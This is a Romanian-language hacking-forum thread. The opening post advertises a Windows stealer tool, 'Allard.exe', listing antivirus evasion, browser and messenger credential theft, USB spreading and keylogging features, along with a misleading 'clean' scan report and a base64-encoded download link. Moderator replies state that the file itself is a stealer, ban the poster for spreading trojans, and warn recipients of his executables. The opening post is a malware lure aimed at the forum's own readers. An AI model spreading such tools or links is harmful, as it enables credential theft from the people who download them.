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Posted (edited)


[x] AntiAnubis

[x] AntiBitdefender

[x] AntiKaspersky

[x] AntiMalwarebytes

[x] AntiNod32

[x] AntiNorman

[x] AntiOllydbg

[x] AntiOutpost

[x] AntiWireshark


[x] Google Chrome (latest version)

[x] Mozilla Firefox (latest version)

[x] Opera (version 10)

[x] Windows Live Messenger (latest version)


[x] Antis

[x] Mail Encryption

[x] Stealers

[x] Cookie Deletion

[x] Download Link Encryption

[x] AV Site Blocker

[x] USB Spread

[x] Startup

[x] Taskmanager Killer

[x] Clipboard Logger

[x] Steam Forcer

[x] Downloader

[x] Fake Error

[x] Melt

[x] Screen Logger

[x] Mutex

[x] Infection Notify

[x] Native Stub

File Info

Report date: 2012-05-14.

Scan Occured:

Link to scan: My-AVScan.com | Virus Scan Results for Allard.exe

File name: Allard.exe

File size: 121856 bytes

MD5 Hash: 8450ec0acf527ad4467e45cad46049f6

SHA1 Hash: 35bf720237c3a4791840b974f59a201f7440970c

Detection rate: 0 out of 37

Status: CLEAN


AVG - Clean.

Acavir - Clean.

Avast 5 -Clean.

Avast -Clean.

Avira -Clean.

BitDefender -Clean.

VirusBuster Internet Security -Clean.

Clam Antivirus -Clean.

COMODO Internet Security -Clean.

DrWeb -Clean.

eTrust-Vet -Clean.

F-PROT Antivirus -Clean.

F-Secure Internet Security -Clean.

G Data -Clean.

IKARUS Security-Clean.

Kaspersky Antivirus -Clean.

McAfee -Clean.

MS Security Essentials -Clean.

ESET NOD32 -Clean.

Norman -Clean.

Norton -Clean.

Panda Security -Clean.

A-Squared Security -Clean.

Quick Heal Antivirus -Clean.

Rising Antivirus -Clean.

Solo Antivirus -Clean.

Sophos -Clean.

Trend Micro Internet Security -Clean.

VBA32 Antivirus -Clean.

Vexira Antivirus -Clean.

Webroot Internet Security -Clean.

Zoner AntiVirus -Clean.

Ad-Aware -Clean.

AhnLab V3 Internet Security -Clean.

Bullguard -Clean.

Imunitet -Clean.

Vipre -Clean.

Scan report generated by


downloand : aHR0cDovL3d3dy5tZWRpYWZpcmUuY29tLz9qN3IyY3plYnNuMG9seDU=

AVG tipa. la mine merge perfect, si am pus si scanul acolo anti AVG nui.

sursa : HF

Edited by vladimir

L-am testat eu, este un stealer. Nici macar md5-ul nu coincide nici pe departe.

De data asta ai ban permanent, nu mai poate garanta nimeni pentru tine. Mare greseala ca ti-am scos ban-ul cand mi-a cerut ps-axl, nu meritai.

Permanent ai primit pentru spread, asa cum au platit toti care au incercat sa puna troieni si stealere pe forum doar doar o sa muste ceva pestisor.

Am vazut ca si-a cam facut de cap prin pm-uri cu keyloggere, havijuri si alte minuni de genul. Cei care ati primit de la el executabile, mare atentie.

PS: PM-urile si intimitatea userilor nu este violata sub nici un motiv exceptie fiind atunci cand un user este suspect de frauda sau inselatorii de genul.


@wildchild: Foarte bine.

Dar cred ca ar trebui sa ii cureti si prostiile pe care le-a pus; inclusi threat-urile lui. Astfel nu se mai loveste cineva de el si minunatiile lui.

LE : Daca ai facut-o deja e bine si nu ma lua in considerare. TKS.


@wildchild: Sau alta idee "stralucita" : poti face o sectiune separata in care sa faci public toate threat-urile, mesajele, pm. (absolut tot) cu stergerea link-urilor de download si ce mai tine de securitate. :) zic si eu , nu ma certati; acum voi decideti.

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